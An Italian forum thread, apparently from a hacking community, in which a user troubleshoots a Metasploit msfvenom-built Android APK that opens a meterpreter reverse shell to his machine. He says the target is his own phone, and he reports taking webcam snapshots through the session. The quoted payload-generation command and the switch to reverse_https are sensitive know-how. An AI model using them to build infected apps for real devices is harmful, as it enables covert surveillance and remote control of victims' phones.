Metasploit

xkekkox93

Nuovo utente
Autore del topic
1 Agosto 2011
13
28
Miglior risposta
0
Ho provato a creare l apk infetto per eseguire alcuni test di penetration sul mio smartphone, ma non è andato a buon fine, qualcuno puo aiutarmi, il problema e che dopo aver aperto l apk la sessione inizia ma un secondo dopo l app si interrompe facendo cadere la sessione in terminale kali ovviamente..
 
  • Like
Reactions: alblinux
Msfvenom -per android/meterpreter/ reverse_tcp LHOST=xxx.xxx.x.x LPORT=443 R > nome.apk
 
Msfvenom -per android/meterpreter/ reverse_tcp LHOST=xxx.xxx.x.x LPORT=443 R > nome.apk
"-per" è sbagliato, piuttosto -p. Tra l'altro c'è uno spazio tra lo slash dopo meterpreter e reverse_tcp, dovresti correggere

PS: posta l'output del comando corretto
 
Si mi sono sbagliato io a scriverlo qui, ma nel terminale è andato bene perché ho creato il file apk
 
Capisco. Come hai settato il client? (msfconsole)

Ecco cosa accade :

91b63ffa574a435e7f1d676676c8fe45.jpg
 
Ultima modifica:
Come pensavo, leggendo su internet, non è una questione di settings, molti hanno lo stesso problema. Il fatto è che non c'è niente di sbagliato nella console e in generale nel procedimento, prova ad usare un altro payload (reverse_https, per esempio). Che smartphone e che versione di Android hai?

NB: probabilmente dipende dallo smartphone e da come gestisce i processi, sul mio Huawei non ho avuto problemi.
 
Come pensavo, leggendo su internet, non è una questione di settings, molti hanno lo stesso problema. Il fatto è che non c'è niente di sbagliato nella console e in generale nel procedimento, prova ad usare un altro payload (reverse_https, per esempio). Che smartphone e che versione di Android hai?

NB: probabilmente dipende dallo smartphone e da come gestisce i processi, sul mio Huawei non ho avuto problemi.
Ciao guarda in realtà ieri provando svariate volte il tuo comando alla fine ha funzionato, cioè è durato un po' di pi la sessione ma comunque non più di 5 minuti per poi crashare con: " reason= Died ", sono riuscito a dare qualche comando come sysinfo, webcam_snap, etc..
Ma non capisco perché dovrebbe cadere la connessione é assurdo,una domanda sciocca e che forse il router che ha qualche firewall?
Il mio smartphone ha kitkat 4.4.2 é un wiko bloom
 
Ciao guarda in realtà ieri provando svariate volte il tuo comando alla fine ha funzionato, cioè è durato un po' di pi la sessione ma comunque non più di 5 minuti per poi crashare con: " reason= Died ", sono riuscito a dare qualche comando come sysinfo, webcam_snap, etc..
Ma non capisco perché dovrebbe cadere la connessione é assurdo,una domanda sciocca e che forse il router che ha qualche firewall?
Il mio smartphone ha kitkat 4.4.2 é un wiko bloom
Probabilmente la causa è lo smartphone, il firewall non c'entra perché se così fosse non ti farebbe connettere. Prova a cambiare payload.
 
Sono riuscito a non far cadere la sessione, con il comando da te suggerito, ti ringrazio, ma ora la curiosità più grande è capire perché con questo comando non crasha e poi che differenza c'è tra i 2 payload?
 
Sono riuscito a non far cadere la sessione, con il comando da te suggerito, ti ringrazio, ma ora la curiosità più grande è capire perché con questo comando non crasha e poi che differenza c'è tra i 2 payload?
Non è un comando quello che hai cambiato, hai cambiato il payload (modulo). Per la differenza tra i due payload ti rimando a
Perfavore, Entra oppure Registrati per vedere i Link!